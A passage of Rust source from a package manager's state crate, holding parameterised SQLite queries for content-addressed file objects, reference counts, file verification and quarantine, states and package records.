hash, kind, size_bytes, created_at, ref_count,
is_executable, is_symlink, symlink_target,
last_seen_at
) VALUES (?1, 'file', ?2, ?3, 0, ?4, ?5, ?6, ?3)
"#,
)
.bind(&hash_str)
.bind(metadata.size)
.bind(now)
.bind(metadata.is_executable)
.bind(metadata.is_symlink)
.bind(&metadata.symlink_target)
.execute(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to insert file object: {e}"),
})?;
ensure_file_verification_row(tx, &hash_str).await?;
Ok(DeduplicationResult {
hash: hash.clone(),
was_duplicate: false,
ref_count: 0,
space_saved: 0,
})
}
/// Helper to ensure a `file_verification` row exists.
async fn ensure_file_verification_row(
tx: &mut Transaction<'_, Sqlite>,
hash_str: &str,
) -> Result<(), Error> {
query(
r#"
INSERT OR IGNORE INTO file_verification (file_hash, status, attempts, last_checked_at, last_error)
VALUES (?1, 'pending', 0, NULL, NULL)
"#,
)
.bind(hash_str)
.execute(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to ensure verification row: {e}"),
})?;
Ok(())
}
/// Insert a package file entry for a `state_packages` row.
///
/// # Errors
///
/// Returns an error if the database operations fail or if the package ID is unknown.
pub async fn add_package_file_entry(
tx: &mut Transaction<'_, Sqlite>,
package_id: i64,
file_ref: &FileReference,
) -> Result<i64, Error> {
let pv_row = query("SELECT package_version_id AS id FROM state_packages WHERE id = ?1")
.bind(package_id)
.fetch_optional(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to resolve package version id: {e}"),
})?;
let Some(pv_id) = pv_row.map(|r| r.get::<i64, _>("id")) else {
return Err(StateError::DatabaseError {
message: format!("unknown state package id {package_id}"),
}
.into());
};
let hash_str = file_ref.hash.to_hex();
query(
r#"
INSERT OR IGNORE INTO package_files
(package_version_id, file_hash, rel_path, mode, uid, gid, mtime)
VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7)
"#,
)
.bind(pv_id)
.bind(&hash_str)
.bind(&file_ref.relative_path)
.bind(file_ref.metadata.permissions as i64)
.bind(file_ref.metadata.uid as i64)
.bind(file_ref.metadata.gid as i64)
.bind(file_ref.metadata.mtime)
.execute(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to insert package file entry: {e}"),
})?;
let row = query(
r#"
SELECT id FROM package_files
WHERE package_version_id = ?1 AND rel_path = ?2
"#,
)
.bind(pv_id)
.bind(&file_ref.relative_path)
.fetch_one(&mut **tx)
.await?;
Ok(row.get("id"))
}
/// Decrement a file refcount and return the new value.
///
/// # Errors
///
/// Returns an error if the database operations fail.
pub async fn decrement_file_object_ref(
tx: &mut Transaction<'_, Sqlite>,
hash: &str,
) -> Result<i64, Error> {
query("UPDATE cas_objects SET ref_count = ref_count - 1 WHERE hash = ?1 AND kind = 'file'")
.bind(hash)
.execute(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to decrement file refcount: {e}"),
})?;
let row = query("SELECT ref_count FROM cas_objects WHERE hash = ?1 AND kind = 'file'")
.bind(hash)
.fetch_optional(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to fetch file refcount: {e}"),
})?;
Ok(row.map(|r| r.get("ref_count")).unwrap_or(0))
}
/// Increment a file refcount and return the new value.
///
/// # Errors
///
/// Returns an error if the database operations fail.
pub async fn increment_file_object_ref(
tx: &mut Transaction<'_, Sqlite>,
hash: &str,
) -> Result<i64, Error> {
query(
"UPDATE cas_objects SET ref_count = ref_count + 1, last_seen_at = strftime('%s','now') WHERE hash = ?1 AND kind = 'file'",
)
.bind(hash)
.execute(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to increment file refcount: {e}"),
})?;
let row = query("SELECT ref_count FROM cas_objects WHERE hash = ?1 AND kind = 'file'")
.bind(hash)
.fetch_optional(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to fetch file refcount: {e}"),
})?;
Ok(row.map(|r| r.get("ref_count")).unwrap_or(0))
}
/// Decrement all file refs for the given state package ID.
///
/// # Errors
///
/// Returns an error if the database operations fail.
pub async fn decrement_file_object_refs_for_package(
tx: &mut Transaction<'_, Sqlite>,
package_id: i64,
) -> Result<usize, Error> {
let rows = query(
r#"
SELECT pf.file_hash
FROM state_packages sp
JOIN package_files pf ON pf.package_version_id = sp.package_version_id
WHERE sp.id = ?1
"#,
)
.bind(package_id)
.fetch_all(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to list package file hashes: {e}"),
})?;
let mut count = 0usize;
for row in rows {
let hash: String = row.get("file_hash");
let _ = decrement_file_object_ref(tx, &hash).await?;
count += 1;
}
Ok(count)
}
/// Force set a file object's refcount.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn set_file_object_ref_count(
tx: &mut Transaction<'_, Sqlite>,
hash: &str,
count: i64,
) -> Result<u64, Error> {
let res = query(
"UPDATE cas_objects SET ref_count = ?1 WHERE hash = ?2 AND kind = 'file' AND ref_count <> ?1",
)
.bind(count)
.bind(hash)
.execute(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to set file refcount: {e}"),
})?;
Ok(res.rows_affected())
}
/// Fetch a file object.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_file_object(
tx: &mut Transaction<'_, Sqlite>,
hash: &Hash,
) -> Result<Option<FileObject>, Error> {
let hash_str = hash.to_hex();
let row = query(
r#"
SELECT hash, size_bytes AS size, created_at, ref_count,
is_executable, is_symlink, symlink_target
FROM cas_objects
WHERE hash = ?1 AND kind = 'file'
"#,
)
.bind(&hash_str)
.fetch_optional(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to fetch file object: {e}"),
})?;
Ok(row.map(|r| FileObject {
hash: r.get("hash"),
size: r.get("size"),
created_at: r.get("created_at"),
ref_count: r.get("ref_count"),
is_executable: r.get("is_executable"),
is_symlink: r.get("is_symlink"),
symlink_target: r.get("symlink_target"),
}))
}
/// Fetch all file objects.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_all_file_objects(
tx: &mut Transaction<'_, Sqlite>,
) -> Result<Vec<FileObject>, Error> {
let rows = query(
r#"
SELECT hash, size_bytes AS size, created_at, ref_count,
is_executable, is_symlink, symlink_target
FROM cas_objects
WHERE kind = 'file'
"#,
)
.fetch_all(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to list file objects: {e}"),
})?;
Ok(rows
.into_iter()
.map(|r| FileObject {
hash: r.get("hash"),
size: r.get("size"),
created_at: r.get("created_at"),
ref_count: r.get("ref_count"),
is_executable: r.get("is_executable"),
is_symlink: r.get("is_symlink"),
symlink_target: r.get("symlink_target"),
})
.collect())
}
/// Hash -> last reference timestamp from states.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_file_last_ref_map(
tx: &mut Transaction<'_, Sqlite>,
) -> Result<HashMap<String, i64>, Error> {
let rows = query(
r#"
SELECT pf.file_hash AS hash, COALESCE(MAX(s.created_at), 0) AS last_ref
FROM package_files pf
JOIN state_packages sp ON sp.package_version_id = pf.package_version_id
JOIN states s ON s.id = sp.state_id
GROUP BY pf.file_hash
"#,
)
.fetch_all(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to build file last-ref map: {e}"),
})?;
let mut map = HashMap::new();
for r in rows {
map.insert(r.get("hash"), r.get("last_ref"));
}
Ok(map)
}
/// Fetch file entries for a state package ID.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_file_entries(
tx: &mut Transaction<'_, Sqlite>,
package_id: i64,
) -> Result<Vec<PackageFileEntry>, Error> {
let rows = query(
r#"
SELECT
pf.id,
sp.id AS package_id,
pf.file_hash,
pf.rel_path AS relative_path,
pf.mode AS permissions,
pf.uid,
pf.gid,
pf.mtime
FROM state_packages sp
JOIN package_files pf ON pf.package_version_id = sp.package_version_id
WHERE sp.id = ?1
ORDER BY pf.rel_path
"#,
)
.bind(package_id)
.fetch_all(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to list package file entries: {e}"),
})?;
Ok(rows
.into_iter()
.map(|r| PackageFileEntry {
id: r.get("id"),
package_id: r.get("package_id"),
file_hash: r.get("file_hash"),
relative_path: r.get("relative_path"),
permissions: r.get("permissions"),
uid: r.get("uid"),
gid: r.get("gid"),
mtime: r.get("mtime"),
})
.collect())
}
/// Fetch file entries by hash.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_file_entries_by_hash(
tx: &mut Transaction<'_, Sqlite>,
file_hash: &str,
) -> Result<Vec<(String, String, String)>, Error> {
let rows = query(
r#"
SELECT DISTINCT
pf.rel_path,
pv.name AS package_name,
pv.version AS package_version
FROM package_files pf
JOIN package_versions pv ON pv.id = pf.package_version_id
WHERE pf.file_hash = ?1
ORDER BY pf.rel_path
"#,
)
.bind(file_hash)
.fetch_all(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to get entries by hash: {e}"),
})?;
Ok(rows
.into_iter()
.map(|r| {
(
r.get("rel_path"),
r.get("package_name"),
r.get("package_version"),
)
})
.collect())
}
/// Update (or insert) an mtime tracker entry.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn update_file_mtime(
tx: &mut Transaction<'_, Sqlite>,
file_path: &str,
verified_mtime: i64,
) -> Result<(), Error> {
query(
r#"
INSERT INTO file_mtime_tracker (file_path, last_verified_mtime, created_at, updated_at)
VALUES (?1, ?2, strftime('%s','now'), strftime('%s','now'))
ON CONFLICT(file_path) DO UPDATE SET
last_verified_mtime = excluded.last_verified_mtime,
updated_at = strftime('%s','now')
"#,
)
.bind(file_path)
.bind(verified_mtime)
.execute(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to update mtime tracker: {e}"),
})?;
Ok(())
}
/// Fetch package file entries for a state + name + version.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_file_entries_by_name(
tx: &mut Transaction<'_, Sqlite>,
state_id: &uuid::Uuid,
package_name: &str,
package_version: &str,
) -> Result<Vec<PackageFileEntry>, Error> {
let rows = query(
r#"
SELECT
pf.id,
sp.id AS package_id,
pf.file_hash,
pf.rel_path AS relative_path,
pf.mode AS permissions,
pf.uid,
pf.gid,
pf.mtime
FROM state_packages sp
JOIN package_versions pv ON pv.id = sp.package_version_id
JOIN package_files pf ON pf.package_version_id = pv.id
WHERE sp.state_id = ?1 AND pv.name = ?2 AND pv.version = ?3
ORDER BY pf.rel_path
"#,
)
.bind(state_id.to_string())
.bind(package_name)
.bind(package_version)
.fetch_all(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to fetch package file entries by name: {e}"),
})?;
Ok(rows
.into_iter()
.map(|r| PackageFileEntry {
id: r.get("id"),
package_id: r.get("package_id"),
file_hash: r.get("file_hash"),
relative_path: r.get("relative_path"),
permissions: r.get("permissions"),
uid: r.get("uid"),
gid: r.get("gid"),
mtime: r.get("mtime"),
})
.collect())
}
/// Fetch package file entries across all states for name/version.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_file_entries_all_states(
tx: &mut Transaction<'_, Sqlite>,
package_name: &str,
package_version: &str,
) -> Result<Vec<PackageFileEntry>, Error> {
let rows = query(
r#"
SELECT
pf.id,
COALESCE((
SELECT sp.id
FROM state_packages sp
WHERE sp.package_version_id = pv.id
ORDER BY sp.added_at DESC
LIMIT 1
), 0) AS package_id,
pf.file_hash,
pf.rel_path AS relative_path,
pf.mode AS permissions,
pf.uid,
pf.gid,
pf.mtime
FROM package_versions pv
JOIN package_files pf ON pf.package_version_id = pv.id
WHERE pv.name = ?1 AND pv.version = ?2
ORDER BY pf.rel_path
"#,
)
.bind(package_name)
.bind(package_version)
.fetch_all(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to fetch package file entries across states: {e}"),
})?;
Ok(rows
.into_iter()
.map(|r| PackageFileEntry {
id: r.get("id"),
package_id: r.get("package_id"),
file_hash: r.get("file_hash"),
relative_path: r.get("relative_path"),
permissions: r.get("permissions"),
uid: r.get("uid"),
gid: r.get("gid"),
mtime: r.get("mtime"),
})
.collect())
}
/// Fetch a file mtime tracker row.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_file_mtime(
tx: &mut Transaction<'_, Sqlite>,
file_path: &str,
) -> Result<Option<FileMTimeTracker>, Error> {
let row = query(
r#"
SELECT file_path, last_verified_mtime
FROM file_mtime_tracker
WHERE file_path = ?1
"#,
)
.bind(file_path)
.fetch_optional(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to fetch file mtime tracker: {e}"),
})?;
Ok(row.map(|r| FileMTimeTracker {
file_path: r.get("file_path"),
last_verified_mtime: r.get("last_verified_mtime"),
}))
}
/// Legacy: mark package file hashed (no-op under schema v2)
///
/// # Errors
///
/// This function does not return an error.
pub async fn mark_package_file_hashed(
_tx: &mut Transaction<'_, Sqlite>,
_package_id: i64,
_computed_hash: &Hash,
) -> Result<(), Error> {
Ok(())
}
/// Fetch mtime trackers for a package name/version.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_file_mtimes(
tx: &mut Transaction<'_, Sqlite>,
package_name: &str,
package_version: &str,
) -> Result<Vec<FileMTimeTracker>, Error> {
let rows = query(
r#"
SELECT DISTINCT fmt.file_path, fmt.last_verified_mtime
FROM file_mtime_tracker fmt
JOIN package_files pf ON pf.rel_path = fmt.file_path
JOIN package_versions pv ON pv.id = pf.package_version_id
WHERE pv.name = ?1 AND pv.version = ?2
ORDER BY fmt.file_path
"#,
)
.bind(package_name)
.bind(package_version)
.fetch_all(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to fetch package file mtime trackers: {e}"),
})?;
Ok(rows
.into_iter()
.map(|r| FileMTimeTracker {
file_path: r.get("file_path"),
last_verified_mtime: r.get("last_verified_mtime"),
})
.collect())
}
/// Clear mtime trackers for a package name/version.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn clear_package_mtime_trackers(
tx: &mut Transaction<'_, Sqlite>,
package_name: &str,
package_version: &str,
) -> Result<u64, Error> {
let result = query(
r#"
DELETE FROM file_mtime_tracker
WHERE file_path IN (
SELECT DISTINCT pf.rel_path
FROM package_files pf
JOIN package_versions pv ON pv.id = pf.package_version_id
WHERE pv.name = ?1 AND pv.version = ?2
)
"#,
)
.bind(package_name)
.bind(package_version)
.execute(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to clear mtime trackers: {e}"),
})?;
Ok(result.rows_affected())
}
/// Remove stale mtime trackers older than threshold.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn clear_old_mtime_trackers(
tx: &mut Transaction<'_, Sqlite>,
max_age_seconds: i64,
) -> Result<u64, Error> {
let cutoff = chrono::Utc::now().timestamp() - max_age_seconds;
let res = query("DELETE FROM file_mtime_tracker WHERE updated_at < ?1")
.bind(cutoff)
.execute(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to clear old mtime trackers: {e}"),
})?;
Ok(res.rows_affected())
}
/// Fetch file objects that need verification.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_objects_needing_verification(
tx: &mut Transaction<'_, Sqlite>,
max_age_seconds: i64,
max_attempts: i32,
limit: i64,
) -> Result<Vec<FileObject>, Error> {
let cutoff = chrono::Utc::now().timestamp() - max_age_seconds;
let rows = query(
r#"
SELECT co.hash,
co.size_bytes AS size,
co.created_at,
co.ref_count,
co.is_executable,
co.is_symlink,
co.symlink_target
FROM cas_objects co
LEFT JOIN file_verification fv ON fv.file_hash = co.hash
WHERE co.kind = 'file' AND co.ref_count > 0
AND (
fv.file_hash IS NULL OR
fv.status = 'pending' OR
(fv.status = 'verified' AND (fv.last_checked_at IS NULL OR fv.last_checked_at < ?1)) OR
(fv.status = 'failed' AND fv.attempts < ?2)
)
ORDER BY
CASE COALESCE(fv.status, 'pending')
WHEN 'failed' THEN 1
WHEN 'pending' THEN 2
WHEN 'verified' THEN 3
ELSE 4
END,
COALESCE(fv.last_checked_at, 0) ASC
LIMIT ?3
"#,
)
.bind(cutoff)
.bind(max_attempts)
.bind(limit)
.fetch_all(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to fetch verification candidates: {e}"),
})?;
Ok(rows
.into_iter()
.map(|r| FileObject {
hash: r.get("hash"),
size: r.get("size"),
created_at: r.get("created_at"),
ref_count: r.get("ref_count"),
is_executable: r.get("is_executable"),
is_symlink: r.get("is_symlink"),
symlink_target: r.get("symlink_target"),
})
.collect())
}
/// Update verification status for a hash.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn update_verification_status(
tx: &mut Transaction<'_, Sqlite>,
hash: &Hash,
status: &str,
error_message: Option<&str>,
) -> Result<(), Error> {
let hash_str = hash.to_hex();
let now = chrono::Utc::now().timestamp();
query(
r#"
INSERT INTO file_verification (file_hash, status, attempts, last_checked_at, last_error)
VALUES (?1, ?2, 1, ?3, ?4)
ON CONFLICT(file_hash) DO UPDATE SET
status = excluded.status,
last_error = excluded.last_error,
last_checked_at = excluded.last_checked_at,
attempts = file_verification.attempts + 1
"#,
)
.bind(&hash_str)
.bind(status)
.bind(now)
.bind(error_message)
.execute(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to update verification status: {e}"),
})?;
Ok(())
}
/// Aggregate verification stats for live file objects.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_verification_stats(
tx: &mut Transaction<'_, Sqlite>,
) -> Result<(i64, i64, i64, i64, i64), Error> {
let row = query(
r#"
SELECT
COUNT(*) AS total_objects,
SUM(CASE WHEN COALESCE(fv.status, 'pending') = 'verified' THEN 1 ELSE 0 END) AS verified_count,
SUM(CASE WHEN COALESCE(fv.status, 'pending') = 'pending' THEN 1 ELSE 0 END) AS pending_count,
SUM(CASE WHEN COALESCE(fv.status, 'pending') = 'failed' THEN 1 ELSE 0 END) AS failed_count,
SUM(CASE WHEN COALESCE(fv.status, 'pending') = 'quarantined' THEN 1 ELSE 0 END) AS quarantined_count
FROM cas_objects co
LEFT JOIN file_verification fv ON fv.file_hash = co.hash
WHERE co.kind = 'file' AND co.ref_count > 0
"#,
)
.fetch_one(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to compute verification stats: {e}"),
})?;
Ok((
row.get("total_objects"),
row.get("verified_count"),
row.get("pending_count"),
row.get("failed_count"),
row.get("quarantined_count"),
))
}
/// Fetch failed verification objects up to limit.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_failed_verification_objects(
tx: &mut Transaction<'_, Sqlite>,
limit: i64,
) -> Result<Vec<(String, String, i32)>, Error> {
let rows = query(
r#"
SELECT fv.file_hash AS hash,
COALESCE(fv.last_error, 'unknown error') AS verification_error,
fv.attempts AS verification_attempts
FROM file_verification fv
JOIN cas_objects co ON co.hash = fv.file_hash
WHERE fv.status = 'failed' AND co.kind = 'file' AND co.ref_count > 0
ORDER BY fv.attempts DESC, COALESCE(fv.last_checked_at, 0) DESC
LIMIT ?1
"#,
)
.bind(limit)
.fetch_all(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to fetch failed verification objects: {e}"),
})?;
Ok(rows
.into_iter()
.map(|r| {
(
r.get("hash"),
r.get("verification_error"),
r.get("verification_attempts"),
)
})
.collect())
}
/// Quarantine a file object.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn quarantine_file_object(
tx: &mut Transaction<'_, Sqlite>,
hash: &Hash,
reason: &str,
) -> Result<(), Error> {
let hash_str = hash.to_hex();
let now = chrono::Utc::now().timestamp();
query(
r#"
INSERT INTO file_verification (file_hash, status, attempts, last_checked_at, last_error)
VALUES (?1, 'quarantined', 1, ?2, ?3)
ON CONFLICT(file_hash) DO UPDATE SET
status = 'quarantined',
last_error = excluded.last_error,
last_checked_at = excluded.last_checked_at
"#,
)
.bind(&hash_str)
.bind(now)
.bind(reason)
.execute(&mut **tx)
.await
.map_err(|e| StateError::DatabaseError {
message: format!("failed to quarantine file object: {e}"),
})?;
Ok(())
}
/// Verify a file object and update tracking.
///
/// # Errors
///
/// Returns an error if the database operations or file store operations fail.
pub async fn verify_file_with_tracking(
tx: &mut Transaction<'_, Sqlite>,
file_store: &sps2_store::FileStore,
hash: &Hash,
) -> Result<bool, Error> {
use sps2_store::FileVerificationResult;
match file_store.verify_file_detailed(hash).await? {
FileVerificationResult::Valid => {
update_verification_status(tx, hash, "verified", None).await?;
Ok(true)
}
FileVerificationResult::Missing => {
update_verification_status(tx, hash, "failed", Some("file missing from store")).await?;
Ok(false)
}
FileVerificationResult::HashMismatch { expected, actual } => {
let msg = format!(
"hash mismatch: expected {}, got {}",
expected.to_hex(),
actual.to_hex()
);
update_verification_status(tx, hash, "failed", Some(&msg)).await?;
Ok(false)
}
FileVerificationResult::Error { message } => {
let msg = format!("verification error: {message}");
update_verification_status(tx, hash, "failed", Some(&msg)).await?;
Ok(false)
}
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/queries_runtime.rs | crates/state/src/queries_runtime.rs | //! Runtime SQL queries for state operations (schema v2)
use crate::models::{Package, State, StoreRef};
use sps2_errors::{Error, StateError};
use sps2_types::StateId;
use sqlx::{query, Row, Sqlite, Transaction};
use std::collections::HashMap;
use std::convert::TryFrom;
/// Get the current active state
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_active_state(tx: &mut Transaction<'_, Sqlite>) -> Result<StateId, Error> {
let row = query("SELECT state_id FROM active_state WHERE id = 1")
.fetch_optional(&mut **tx)
.await?;
match row {
Some(r) => {
let state_id: String = r.get("state_id");
let id = uuid::Uuid::parse_str(&state_id)
.map_err(|e| Error::internal(format!("invalid state ID: {e}")))?;
Ok(id)
}
None => Err(StateError::ActiveStateMissing.into()),
}
}
/// Set the active state pointer
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn set_active_state(
tx: &mut Transaction<'_, Sqlite>,
state_id: &StateId,
) -> Result<(), Error> {
let id_str = state_id.to_string();
let now = chrono::Utc::now().timestamp();
query("INSERT OR REPLACE INTO active_state (id, state_id, updated_at) VALUES (1, ?1, ?2)")
.bind(id_str)
.bind(now)
.execute(&mut **tx)
.await?;
Ok(())
}
/// Insert a new state row
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn create_state(
tx: &mut Transaction<'_, Sqlite>,
id: &StateId,
parent: Option<&StateId>,
operation: &str,
) -> Result<(), Error> {
let id_str = id.to_string();
let parent_str = parent.map(ToString::to_string);
let now = chrono::Utc::now().timestamp();
query(
"INSERT INTO states (id, parent_id, created_at, operation, success) VALUES (?1, ?2, ?3, ?4, 1)",
)
.bind(id_str)
.bind(parent_str)
.bind(now)
.bind(operation)
.execute(&mut **tx)
.await?;
Ok(())
}
/// Get packages present in a particular state snapshot
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_state_packages(
tx: &mut Transaction<'_, Sqlite>,
state_id: &StateId,
) -> Result<Vec<Package>, Error> {
let id_str = state_id.to_string();
let rows = query(
r#"
SELECT
sp.id AS pkg_row_id,
sp.state_id AS state_id,
pv.name AS name,
pv.version AS version,
pv.store_hash AS hash,
pv.size_bytes AS size,
sp.added_at AS installed_at
FROM state_packages sp
JOIN package_versions pv ON pv.id = sp.package_version_id
WHERE sp.state_id = ?1
ORDER BY pv.name
"#,
)
.bind(id_str)
.fetch_all(&mut **tx)
.await?;
Ok(rows
.into_iter()
.map(|row| Package {
id: row.get("pkg_row_id"),
state_id: row.get("state_id"),
name: row.get("name"),
version: row.get("version"),
hash: row.get("hash"),
size: row.get("size"),
installed_at: row.get("installed_at"),
venv_path: None,
})
.collect())
}
/// All packages for a state (same as `get_state_packages` under v2 schema)
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_all_active_packages(
tx: &mut Transaction<'_, Sqlite>,
state_id: &StateId,
) -> Result<Vec<Package>, Error> {
get_state_packages(tx, state_id).await
}
/// Ensure a package version exists and add it to a state snapshot
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn add_package(
tx: &mut Transaction<'_, Sqlite>,
state_id: &StateId,
name: &str,
version: &str,
store_hash: &str,
size: i64,
) -> Result<i64, Error> {
let id_str = state_id.to_string();
let now = chrono::Utc::now().timestamp();
query(
r#"
INSERT INTO package_versions (name, version, store_hash, size_bytes, created_at)
VALUES (?1, ?2, ?3, ?4, ?5)
ON CONFLICT(name, version) DO UPDATE SET
store_hash = excluded.store_hash,
size_bytes = excluded.size_bytes
"#,
)
.bind(name)
.bind(version)
.bind(store_hash)
.bind(size)
.bind(now)
.execute(&mut **tx)
.await?;
query(
r#"
INSERT INTO state_packages (state_id, package_version_id, install_size_bytes, added_at)
VALUES (?1,
(SELECT id FROM package_versions WHERE name = ?2 AND version = ?3),
?4,
?5)
"#,
)
.bind(&id_str)
.bind(name)
.bind(version)
.bind(size)
.bind(now)
.execute(&mut **tx)
.await?;
let row = query("SELECT last_insert_rowid() as id")
.fetch_one(&mut **tx)
.await?;
Ok(row.get("id"))
}
/// Remove a package version reference from a state snapshot
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn remove_package(
tx: &mut Transaction<'_, Sqlite>,
state_id: &StateId,
name: &str,
) -> Result<(), Error> {
let id_str = state_id.to_string();
query(
r#"
DELETE FROM state_packages
WHERE state_id = ?1
AND package_version_id IN (SELECT id FROM package_versions WHERE name = ?2)
"#,
)
.bind(id_str)
.bind(name)
.execute(&mut **tx)
.await?;
Ok(())
}
/// Ensure an archive CAS row exists
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_or_create_store_ref(
tx: &mut Transaction<'_, Sqlite>,
hash: &str,
size: i64,
) -> Result<(), Error> {
let now = chrono::Utc::now().timestamp();
query(
r#"
INSERT OR IGNORE INTO cas_objects (hash, kind, size_bytes, created_at, ref_count)
VALUES (?1, 'archive', ?2, ?3, 0)
"#,
)
.bind(hash)
.bind(size)
.bind(now)
.execute(&mut **tx)
.await?;
Ok(())
}
/// Increment archive refcount
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn increment_store_ref(
tx: &mut Transaction<'_, Sqlite>,
hash: &str,
) -> Result<(), Error> {
query("UPDATE cas_objects SET ref_count = ref_count + 1 WHERE hash = ?1 AND kind = 'archive'")
.bind(hash)
.execute(&mut **tx)
.await?;
Ok(())
}
/// Decrement archive refcount
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn decrement_store_ref(
tx: &mut Transaction<'_, Sqlite>,
hash: &str,
) -> Result<(), Error> {
query("UPDATE cas_objects SET ref_count = ref_count - 1 WHERE hash = ?1 AND kind = 'archive'")
.bind(hash)
.execute(&mut **tx)
.await?;
Ok(())
}
/// Force-set archive refcount
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn set_store_ref_count(
tx: &mut Transaction<'_, Sqlite>,
hash: &str,
count: i64,
) -> Result<u64, Error> {
let res = query(
"UPDATE cas_objects SET ref_count = ?1 WHERE hash = ?2 AND kind = 'archive' AND ref_count <> ?1",
)
.bind(count)
.bind(hash)
.execute(&mut **tx)
.await?;
Ok(res.rows_affected())
}
/// Fetch archive CAS rows with refcount <= 0
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_unreferenced_items(
tx: &mut Transaction<'_, Sqlite>,
) -> Result<Vec<StoreRef>, Error> {
let rows = query(
r#"
SELECT hash, ref_count, size_bytes AS size, created_at
FROM cas_objects
WHERE kind = 'archive' AND ref_count <= 0
"#,
)
.fetch_all(&mut **tx)
.await?;
Ok(rows
.into_iter()
.map(|row| StoreRef {
hash: row.get("hash"),
ref_count: row.get("ref_count"),
size: row.get("size"),
created_at: row.get("created_at"),
})
.collect())
}
/// Check whether a given state exists
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn state_exists(
tx: &mut Transaction<'_, Sqlite>,
state_id: &StateId,
) -> Result<bool, Error> {
let id_str = state_id.to_string();
let row = query("SELECT 1 FROM states WHERE id = ?1")
.bind(id_str)
.fetch_optional(&mut **tx)
.await?;
Ok(row.is_some())
}
/// List state IDs ordered by creation time (desc)
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn list_states(tx: &mut Transaction<'_, Sqlite>) -> Result<Vec<StateId>, Error> {
let rows = query("SELECT id FROM states ORDER BY created_at DESC")
.fetch_all(&mut **tx)
.await?;
let mut result = Vec::with_capacity(rows.len());
for r in rows {
let id: String = r.get("id");
result.push(
uuid::Uuid::parse_str(&id)
.map_err(|e| Error::internal(format!("invalid state ID: {e}")))?,
);
}
Ok(result)
}
/// List state names for a given state (unique package names)
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_state_package_names(
tx: &mut Transaction<'_, Sqlite>,
state_id: &StateId,
) -> Result<Vec<String>, Error> {
let id_str = state_id.to_string();
let rows = query(
r#"
SELECT DISTINCT pv.name
FROM state_packages sp
JOIN package_versions pv ON pv.id = sp.package_version_id
WHERE sp.state_id = ?1
ORDER BY pv.name
"#,
)
.bind(id_str)
.fetch_all(&mut **tx)
.await?;
Ok(rows.into_iter().map(|r| r.get("name")).collect())
}
/// List all states with metadata
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_all_states(tx: &mut Transaction<'_, Sqlite>) -> Result<Vec<State>, Error> {
let rows = query(
r#"
